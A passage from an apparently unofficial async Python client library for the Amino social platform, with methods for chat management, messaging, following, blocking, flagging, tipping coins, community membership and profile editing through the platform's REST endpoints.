async with self.session.post(f"{self.api}/g/s/chat/thread", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def invite_to_chat(self, userId: Union[str, list], chatId: str):
"""
Invite a User or List of Users to a Chat.
**Parameters**
- **userId** : ID of the User or List of User IDs.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str): userIds = [userId]
elif isinstance(userId, list): userIds = userId
else: raise exceptions.WrongType(type(userId))
data = json.dumps({
"uids": userIds,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/invite", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def kick(self, userId: str, chatId: str, allowRejoin: bool = True):
if allowRejoin: allowRejoin = 1
if not allowRejoin: allowRejoin = 0
async with self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/member/{userId}?allowRejoin={allowRejoin}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_chat_messages(self, chatId: str, size: int = 25, pageToken: str = None):
"""
List of Messages from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- *size* : Size of the list.
- *size* : Size of the list.
- *pageToken* : Next Page Token.
**Returns**
- **Success** : :meth:`Message List <amino.lib.util.objects.MessageList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if pageToken is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&pageToken={pageToken}&size={size}"
else: url = f"{self.api}/g/s/chat/thread/{chatId}/message?v=2&pagingType=t&size={size}"
async with self.session.get(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.GetMessages(json.loads(await response.text())).GetMessages
async def get_message_info(self, chatId: str, messageId: str):
"""
Information of an Message from an Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **messageId** : ID of the Message.
**Returns**
- **Success** : :meth:`Message Object <amino.lib.util.objects.Message>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Message(json.loads(await response.text())["message"]).Message
async def get_community_info(self, comId: str):
"""
Information of an Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : :meth:`Community Object <amino.lib.util.objects.Community>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s-x{comId}/community/info?withInfluencerList=1&withTopicList=true&influencerListOrderStrategy=fansCount", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.Community(json.loads(await response.text())["community"]).Community
async def search_community(self, aminoId: str):
"""
Search a Community byt its Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Community.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/search/amino-id-and-link?q={aminoId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else:
response = json.loads(await response.text())["resultList"]
if len(response) == 0: raise exceptions.CommunityNotFound(aminoId)
else: return objects.CommunityList([com["refObject"] for com in response]).CommunityList
async def get_user_following(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that the User is Following.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/joined?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["userProfileList"]).UserProfileList
async def get_user_followers(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that are Following the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`User List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/member?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["userProfileList"]).UserProfileList
async def get_user_visitors(self, userId: str, start: int = 0, size: int = 25):
"""
List of Users that Visited the User.
**Parameters**
- **userId** : ID of the User.
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Visitors List <amino.lib.util.objects.VisitorsList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/visitors?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.VisitorsList(json.loads(await response.text())).VisitorsList
async def get_blocked_users(self, start: int = 0, size: int = 25):
"""
List of Users that the User Blocked.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Users List <amino.lib.util.objects.UserProfileList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/block?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.UserProfileList(json.loads(await response.text())["userProfileList"]).UserProfileList
async def get_blog_info(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None):
if blogId or quizId:
if quizId is not None: blogId = quizId
async with self.session.get(f"{self.api}/g/s/blog/{blogId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.GetBlogInfo(json.loads(await response.text())).GetBlogInfo
elif wikiId:
async with self.session.get(f"{self.api}/g/s/item/{wikiId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.GetWikiInfo(json.loads(await response.text())).GetWikiInfo
elif fileId:
async with self.session.get(f"{self.api}/g/s/shared-folder/files/{fileId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.SharedFolderFile(json.loads(await response.text())["file"]).SharedFolderFile
else: raise exceptions.SpecifyType()
async def get_blog_comments(self, blogId: str = None, wikiId: str = None, quizId: str = None, fileId: str = None, sorting: str = "newest", start: int = 0, size: int = 25):
if sorting == "newest": sorting = "newest"
elif sorting == "oldest": sorting = "oldest"
elif sorting == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
if blogId or quizId:
if quizId is not None: blogId = quizId
url = f"{self.api}/g/s/blog/{blogId}/comment?sort={sorting}&start={start}&size={size}"
elif wikiId: url = f"{self.api}/g/s/item/{wikiId}/comment?sort={sorting}&start={start}&size={size}"
elif fileId: url = f"{self.api}/g/s/shared-folder/files/{fileId}/comment?sort={sorting}&start={start}&size={size}"
else: raise exceptions.SpecifyType()
async with self.session.get(url, headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommentList(json.loads(await response.text())["commentList"]).CommentList
async def get_blocker_users(self, start: int = 0, size: int = 25):
"""
List of Users that are Blocking the User.
**Parameters**
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`List of User IDs <None>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/block/full-list?start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return json.loads(await response.text())["blockerUidList"]
async def get_wall_comments(self, userId: str, sorting: str, start: int = 0, size: int = 25):
"""
List of Wall Comments of an User.
**Parameters**
- **userId** : ID of the User.
- **sorting** : Order of the Comments.
- ``newest``, ``oldest``, ``top``
- *start* : Where to start the list.
- *size* : Size of the list.
**Returns**
- **Success** : :meth:`Comments List <amino.lib.util.objects.CommentList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if sorting.lower() == "newest": sorting = "newest"
elif sorting.lower() == "oldest": sorting = "oldest"
elif sorting.lower() == "top": sorting = "vote"
else: raise exceptions.WrongType(sorting)
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/g-comment?sort={sorting}&start={start}&size={size}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommentList(json.loads(await response.text())["commentList"]).CommentList
async def flag(self, reason: str, flagType: int, userId: str = None, blogId: str = None, wikiId: str = None, asGuest: bool = False):
"""
Flag a User, Blog or Wiki.
**Parameters**
- **reason** : Reason of the Flag.
- **flagType** : Type of the Flag.
- **userId** : ID of the User.
- **blogId** : ID of the Blog.
- **wikiId** : ID of the Wiki.
- *asGuest* : Execute as a Guest.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded
if flagType is None: raise exceptions.FlagTypeNeeded
data = {
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
}
if userId:
data["objectId"] = userId
data["objectType"] = 0
elif blogId:
data["objectId"] = blogId
data["objectType"] = 1
elif wikiId:
data["objectId"] = wikiId
data["objectType"] = 2
else: raise exceptions.SpecifyType
if asGuest: flg = "g-flag"
else: flg = "flag"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/{flg}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def send_message(self, chatId: str, message: str = None, messageType: int = 0, file: BinaryIO = None, fileType: str = None, replyTo: str = None, mentionUserIds: list = None, stickerId: str = None, embedId: str = None, embedType: int = None, embedLink: str = None, embedTitle: str = None, embedContent: str = None, embedImage: BinaryIO = None):
"""
Send a Message to a Chat.
**Parameters**
- **message** : Message to be sent
- **chatId** : ID of the Chat.
- **file** : File to be sent.
- **fileType** : Type of the file.
- ``audio``, ``image``, ``gif``
- **messageType** : Type of the Message.
- **mentionUserIds** : List of User IDS to mention. '@' needed in the Message.
- **replyTo** : Message ID to reply to.
- **stickerId** : Sticker ID to be sent.
- **embedTitle** : Title of the Embed.
- **embedContent** : Content of the Embed.
- **embedLink** : Link of the Embed.
- **embedImage** : Image of the Embed.
- **embedId** : ID of the Embed.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is not None and file is None:
message = message.replace("<$", "").replace("$>", "")
mentions = []
if mentionUserIds:
for mention_uid in mentionUserIds:
mentions.append({"uid": mention_uid})
if embedImage:
embedImage = [[100, await self.upload_media(embedImage, "image"), None]]
data = {
"type": messageType,
"content": message,
"clientRefId": int(timestamp() / 10 % 1000000000),
"attachedObject": {
"objectId": embedId,
"objectType": embedType,
"link": embedLink,
"title": embedTitle,
"content": embedContent,
"mediaList": embedImage
},
"extensions": {"mentionedArray": mentions},
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["replyMessageId"] = replyTo
if stickerId:
data["content"] = None
data["stickerId"] = stickerId
data["type"] = 3
if file:
data["content"] = None
if fileType == "audio":
data["type"] = 2
data["mediaType"] = 110
elif fileType == "image":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/jpg"
data["mediaUhqEnabled"] = True
elif fileType == "gif":
data["mediaType"] = 100
data["mediaUploadValueContentType"] = "image/gif"
data["mediaUhqEnabled"] = True
else: raise exceptions.SpecifyType()
data["mediaUploadValue"] = base64.b64encode(file.read()).decode()
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def delete_message(self, chatId: str, messageId: str, asStaff: bool = False, reason: str = None):
"""
Delete a Message from a Chat.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
- **asStaff** : If execute as a Staff member (Leader or Curator).
- **reason** : Reason of the action to show on the Moderation History.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"adminOpName": 102,
"adminOpNote": {"content": reason},
"timestamp": int(timestamp() * 1000)
}
data = json.dumps(data)
if not asStaff:
async with self.session.delete(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/message/{messageId}/admin", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def mark_as_read(self, chatId: str, messageId: str):
"""
Mark a Message from a Chat as Read.
**Parameters**
- **messageId** : ID of the Message.
- **chatId** : ID of the Chat.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({
"messageId": messageId,
"timestamp": int(timestamp() * 1000)
})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/mark-as-read", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def edit_chat(self, chatId: str, doNotDisturb: bool = None, pinChat: bool = None, title: str = None, icon: str = None, backgroundImage: BinaryIO = None, content: str = None, announcement: str = None, coHosts: list = None, keywords: list = None, pinAnnouncement: bool = None, publishToGlobal: bool = None, canTip: bool = None, viewOnly: bool = None, canInvite: bool = None, fansOnly: bool = None):
"""
Send a Message to a Chat.
**Parameters**
- **chatId** : ID of the Chat.
- **title** : Title of the Chat.
- **content** : Content of the Chat.
- **icon** : Icon of the Chat.
- **backgroundImage** : Background Image of the Chat.
- **announcement** : Announcement of the Chat.
- **pinAnnouncement** : If the Chat Announcement should Pinned or not.
- **coHosts** : List of User IDS to be Co-Host.
- **keywords** : List of Keywords of the Chat.
- **viewOnly** : If the Chat should be on View Only or not.
- **canTip** : If the Chat should be Tippable or not.
- **canInvite** : If the Chat should be Invitable or not.
- **fansOnly** : If the Chat should be Fans Only or not.
- **publishToGlobal** : If the Chat should show on Public Chats or not.
- **doNotDisturb** : If the Chat should Do Not Disturb or not.
- **pinChat** : If the Chat should Pinned or not.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if title: data["title"] = title
if content: data["content"] = content
if icon: data["icon"] = icon
if keywords: data["keywords"] = keywords
if announcement: data["extensions"] = {"announcement": announcement}
if pinAnnouncement: data["extensions"] = {"pinAnnouncement": pinAnnouncement}
if fansOnly: data["extensions"] = {"fansOnly": fansOnly}
if publishToGlobal: data["publishToGlobal"] = 0
if not publishToGlobal: data["publishToGlobal"] = 1
res = []
if doNotDisturb is not None:
if doNotDisturb:
data = json.dumps({"alertOption": 2, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not doNotDisturb:
data = json.dumps({"alertOption": 1, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/alert", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if pinChat is not None:
if pinChat:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/pin", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not pinChat:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/unpin", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if backgroundImage is not None:
data = json.dumps({"media": [100, await self.upload_media(backgroundImage, "image"), None], "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/member/{self.userId}/background", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if coHosts is not None:
data = json.dumps({"uidList": coHosts, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/co-host", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if viewOnly is not None:
if viewOnly:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/enable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not viewOnly:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/view-only/disable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if canInvite is not None:
if canInvite:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/enable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not canInvite:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/members-can-invite/disable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if canTip is not None:
if canTip:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/enable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
if not canTip:
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}/tipping-perm-status/disable", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/chat/thread/{chatId}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: res.append(exceptions.CheckException(json.loads(await response.text())))
else: res.append(response.status)
return res
async def visit(self, userId: str):
"""
Visit an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}?action=visit", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def send_coins(self, coins: int, blogId: str = None, chatId: str = None, objectId: str = None, transactionId: str = None):
url = None
if transactionId is None: transactionId = str(uuid4())
data = {
"coins": coins,
"tippingContext": {"transactionId": transactionId},
"timestamp": int(timestamp() * 1000)
}
if blogId is not None: url = f"{self.api}/g/s/blog/{blogId}/tipping"
if chatId is not None: url = f"{self.api}/g/s/chat/thread/{chatId}/tipping"
if objectId is not None:
data["objectId"] = objectId
data["objectType"] = 2
url = f"{self.api}/g/s/tipping"
if url is None: raise exceptions.SpecifyType()
data = json.dumps(data)
async with self.session.post(url, headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def follow(self, userId: Union[str, list]):
"""
Follow an User or Multiple Users.
**Parameters**
- **userId** : ID of the User or List of IDs of the Users.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if isinstance(userId, str):
async with self.session.post(f"{self.api}/g/s/user-profile/{userId}/member", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif isinstance(userId, list):
data = json.dumps({"targetUidList": userId, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/joined", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
else: raise exceptions.WrongType(type(userId))
async def unfollow(self, userId: str):
"""
Unfollow an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/user-profile/{userId}/member/{self.userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def block(self, userId: str):
"""
Block an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def unblock(self, userId: str):
"""
Unblock an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/block/{userId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def join_community(self, comId: str, invitationCode: str = None):
"""
Join a Community.
**Parameters**
- **comId** : ID of the Community.
- **invitationCode** : Invitation Code.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if invitationCode: data["invitationId"] = await self.link_identify(invitationCode)
data = json.dumps(data)
async with self.session.post(f"{self.api}/x{comId}/s/community/join", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def request_join_community(self, comId: str, message: str = None):
"""
Request to join a Community.
**Parameters**
- **comId** : ID of the Community.
- **message** : Message to be sent.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"message": message, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/x{comId}/s/community/membership-request", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def leave_community(self, comId: str):
"""
Leave a Community.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/x{comId}/s/community/leave", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def flag_community(self, comId: str, reason: str, flagType: int, isGuest: bool = False):
"""
Flag a Community.
**Parameters**
- **comId** : ID of the Community.
- **reason** : Reason of the Flag.
- **flagType** : Type of Flag.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if reason is None: raise exceptions.ReasonNeeded()
if flagType is None: raise exceptions.FlagTypeNeeded()
data = json.dumps({
"objectId": comId,
"objectType": 16,
"flagType": flagType,
"message": reason,
"timestamp": int(timestamp() * 1000)
})
if isGuest: flg = "g-flag"
else: flg = "flag"
async with self.session.post(f"{self.api}/x{comId}/s/{flg}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def edit_profile(self, nickname: str = None, content: str = None, icon: BinaryIO = None, backgroundColor: str = None, backgroundImage: str = None, defaultBubbleId: str = None):
"""
Edit account's Profile.
**Parameters**
- **nickname** : Nickname of the Profile.
- **content** : Biography of the Profile.
- **icon** : Icon of the Profile.
- **backgroundImage** : Url of the Background Picture of the Profile.
- **backgroundColor** : Hexadecimal Background Color of the Profile.
- **defaultBubbleId** : Chat bubble ID.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {
"address": None,
"latitude": 0,
"longitude": 0,
"mediaList": None,
"eventSource": "UserProfileView",
"timestamp": int(timestamp() * 1000)
}
if nickname: data["nickname"] = nickname
if icon: data["icon"] = await self.upload_media(icon, "image")
if content: data["content"] = content
if backgroundColor: data["extensions"] = {"style": {"backgroundColor": backgroundColor}}
if backgroundImage: data["extensions"] = {"style": {"backgroundMediaList": [[100, backgroundImage, None, None, None]]}}
if defaultBubbleId: data["extensions"] = {"defaultBubbleId": defaultBubbleId}
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def set_privacy_status(self, isAnonymous: bool = False, getNotifications: bool = False):
"""
Edit account's Privacy Status.
**Parameters**
- **isAnonymous** : If visibility should be Anonymous or not.
- **getNotifications** : If account should get new Visitors Notifications.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = {"timestamp": int(timestamp() * 1000)}
if not isAnonymous: data["privacyMode"] = 1
if isAnonymous: data["privacyMode"] = 2
if not getNotifications: data["notificationStatus"] = 2
if getNotifications: data["privacyMode"] = 1
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/account/visit-settings", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def set_amino_id(self, aminoId: str):
"""
Edit account's Amino ID.
**Parameters**
- **aminoId** : Amino ID of the Account.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"aminoId": aminoId, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/account/change-amino-id", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def get_linked_communities(self, userId: str):
"""
Get a List of Linked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommunityList(json.loads(await response.text())["linkedCommunityList"]).CommunityList
async def get_unlinked_communities(self, userId: str):
"""
Get a List of Unlinked Communities of an User.
**Parameters**
- **userId** : ID of the User.
**Returns**
- **Success** : :meth:`Community List <amino.lib.util.objects.CommunityList>`
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.get(f"{self.api}/g/s/user-profile/{userId}/linked-community", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return objects.CommunityList(json.loads(await response.text())["unlinkedCommunityList"]).CommunityList
async def reorder_linked_communities(self, comIds: list):
"""
Reorder List of Linked Communities.
**Parameters**
- **comIds** : IDS of the Communities.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
data = json.dumps({"ndcIds": comIds, "timestamp": int(timestamp() * 1000)})
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/reorder", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def add_linked_community(self, comId: str):
"""
Add a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.post(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def remove_linked_community(self, comId: str):
"""
Remove a Linked Community on your profile.
**Parameters**
- **comId** : ID of the Community.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
async with self.session.delete(f"{self.api}/g/s/user-profile/{self.userId}/linked-community/{comId}", headers=self.parse_headers()) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
async def comment(self, message: str, userId: str = None, blogId: str = None, wikiId: str = None, replyTo: str = None):
"""
Comment on a User's Wall, Blog or Wiki.
**Parameters**
- **message** : Message to be sent.
- **userId** : ID of the User. (for Walls)
- **blogId** : ID of the Blog. (for Blogs)
- **wikiId** : ID of the Wiki. (for Wikis)
- **replyTo** : ID of the Comment to Reply to.
**Returns**
- **Success** : 200 (int)
- **Fail** : :meth:`Exceptions <amino.lib.util.exceptions>`
"""
if message is None: raise exceptions.MessageNeeded
data = {
"content": message,
"stickerId": None,
"type": 0,
"timestamp": int(timestamp() * 1000)
}
if replyTo: data["respondTo"] = replyTo
if userId:
data["eventSource"] = "UserProfileView"
data = json.dumps(data)
async with self.session.post(f"{self.api}/g/s/user-profile/{userId}/g-comment", headers=self.parse_headers(data=data), data=data) as response:
if response.status != 200: return exceptions.CheckException(json.loads(await response.text()))
else: return response.status
elif blogId:
data["eventSource"] = "PostDetailView"
data = json.dumps(data)
